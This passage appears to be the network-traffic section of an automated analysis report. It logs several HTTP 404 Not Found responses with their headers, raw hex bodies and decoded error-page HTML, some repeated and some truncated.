72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:35:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:35:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 08:35:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 14 39 42 09 6c fc 7e d6 de b2 23 bf e8 65 00 26 8a b3 e2 61 f0 cf de a5 bd 9f f6 3a 86 4d 70 0c 47 de 8f e5 96 e3 84 a9 ff 30 b8 e9 4f ac c2 0f d3 77 dd ff f9 9d fd d2 b5 ab 30 4b bf 00 d1 b3 ca 2d 6e f4 e1 84 65 1e 5b 40 17 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 46 6e 77 7a 66 f2 3e 76 3d a0 25 ab ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 55 75 09 ac e3 b8 37 8b 2f a8 79 36 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 16 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 1b e3 34 41 bf 9f f6 3a 36 b9 b4 b7 b1 2b 29 6f 39 b2 3e 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 c7 f8 27 40 bb b6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 9b b0 bd be ae b0 84 0e af 07 af 34 f1 8e fe ad 1a 7a 73 df 3b ae 9d 15 56 6f bf 87 01 08 29 6e d1 07 a1 f7 1b bd 6a 1c c4 23 86 bd b2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 05 e2 4c 73 eb 39 af 4c 60 f4 90 18 0f df 18 bc 62 e2 73 14 bf c6 b5 8f 0c f5 0b 6a ac e3 1b db 7c f7 b4 30 bd c4 ec 0f 62 5e 1c 96 d5 fd 25 ad f4 80 4f dd 41 56 57 65 08 02 42 ff f1 c6 7e 6f c8 57 ee 6e 82 f1 77 78 5d f5 bf 49 0b 78 8a c3 1b b6 bc 38 eb fd ab 8f 8c ef 77 b8 58 da 8a 43 1f 18 d9 06 27 04 b7 78 1b 7f 23 f9 f5 c6 6f 5e 40 ff d1 4e 97 84 0b 72 d4 67 31 ac 0f 04 f7 61 62 f9 b7 66 fc 2e d4 a7 b1 f7 b2 b4 3f e5 80 04 75 2b 5f 9f 73 db 97 fc b8 cf 62 e7 4d 8a 5e 8f d7 52 fe a8 83 36 2b 9c fb 3d c0 48 04 72 54 ff e7 de 8a e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 08:35:52 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 14 39 42 09 6c fc 7e d6 de b2 23 bf e8 65 00 26 8a b3 e2 61 f0 cf de a5 bd 9f f6 3a 86 4d 70 0c 47 de 8f e5 96 e3 84 a9 ff 30 b8 e9 4f ac c2 0f d3 77 dd ff f9 9d fd d2 b5 ab 30 4b bf 00 d1 b3 ca 2d 6e f4 e1 84 65 1e 5b 40 17 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 46 6e 77 7a 66 f2 3e 76 3d a0 25 ab ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 55 75 09 ac e3 b8 37 8b 2f a8 79 36 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 16 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 1b e3 34 41 bf 9f f6 3a 36 b9 b4 b7 b1 2b 29 6f 39 b2 3e 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 c7 f8 27 40 bb b6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 9b b0 bd be ae b0 84 0e af 07 af 34 f1 8e fe ad 1a 7a 73 df 3b ae 9d 15 56 6f bf 87 01 08 29 6e d1 07 a1 f7 1b bd 6a 1c c4 23 86 bd b2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 05 e2 4c 73 eb 39 af 4c 60 f4 90 18 0f df 18 bc 62 e2 73 14 bf c6 b5 8f 0c f5 0b 6a ac e3 1b db 7c f7 b4 30 bd c4 ec 0f 62 5e 1c 96 d5 fd 25 ad f4 80 4f dd 41 56 57 65 08 02 42 ff f1 c6 7e 6f c8 57 ee 6e 82 f1 77 78 5d f5 bf 49 0b 78 8a c3 1b b6 bc 38 eb fd ab 8f 8c ef 77 b8 58 da 8a 43 1f 18 d9 06 27 04 b7 78 1b 7f 23 f9 f5 c6 6f 5e 40 ff d1 4e 97 84 0b 72 d4 67 31 ac 0f 04 f7 61 62 f9 b7 66 fc 2e d4 a7 b1 f7 b2 b4 3f e5 80 04 75 2b 5f 9f 73 db 97 fc b8 cf 62 e7 4d 8a 5e 8f d7 52 fe a8 83 36 2b 9c fb 3d c0 48 04 72 54 ff e7 de 8a e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 08:35:55 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 14 39 42 09 6c fc 7e d6 de b2 23 bf e8 65 00 26 8a b3 e2 61 f0 cf de a5 bd 9f f6 3a 86 4d 70 0c 47 de 8f e5 96 e3 84 a9 ff 30 b8 e9 4f ac c2 0f d3 77 dd ff f9 9d fd d2 b5 ab 30 4b bf 00 d1 b3 ca 2d 6e f4 e1 84 65 1e 5b 40 17 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 46 6e 77 7a 66 f2 3e 76 3d a0 25 ab ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 55 75 09 ac e3 b8 37 8b 2f a8 79 36 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 16 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 1b e3 34 41 bf 9f f6 3a 36 b9 b4 b7 b1 2b 29 6f 39 b2 3e 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 c7 f8 27 40 bb b6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 9b b0 bd be ae b0 84 0e af 07 af 34 f1 8e fe ad 1a 7a 73 df 3b ae 9d 15 56 6f bf 87 01 08 29 6e d1 07 a1 f7 1b bd 6a 1c c4 23 86 bd b2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 05 e2 4c 73 eb 39 af 4c 60 f4 90 18 0f df 18 bc 62 e2 73 14 bf c6 b5 8f 0c f5 0b 6a ac e3 1b db 7c f7 b4 30 bd c4 ec 0f 62 5e 1c 96 d5 fd 25 ad f4 80 4f dd 41 56 57 65 08 02 42 ff f1 c6 7e 6f c8 57 ee 6e 82 f1 77 78 5d f5 bf 49 0b 78 8a c3 1b b6 bc 38 eb fd ab 8f 8c ef 77 b8 58 da 8a 43 1f 18 d9 06 27 04 b7 78 1b 7f 23 f9 f5 c6 6f 5e 40 ff d1 4e 97 84 0b 72 d4 67 31 ac 0f 04 f7 61 62 f9 b7 66 fc 2e d4 a7 b1 f7 b2 b4 3f e5 80 04 75 2b 5f 9f 73 db 97 fc b8 cf 62 e7 4d 8a 5e 8f d7 52 fe a8 83 36 2b 9c fb 3d c0 48 04 72 54 ff e7 de 8a e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 08:35:57 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 37 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:36:03 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 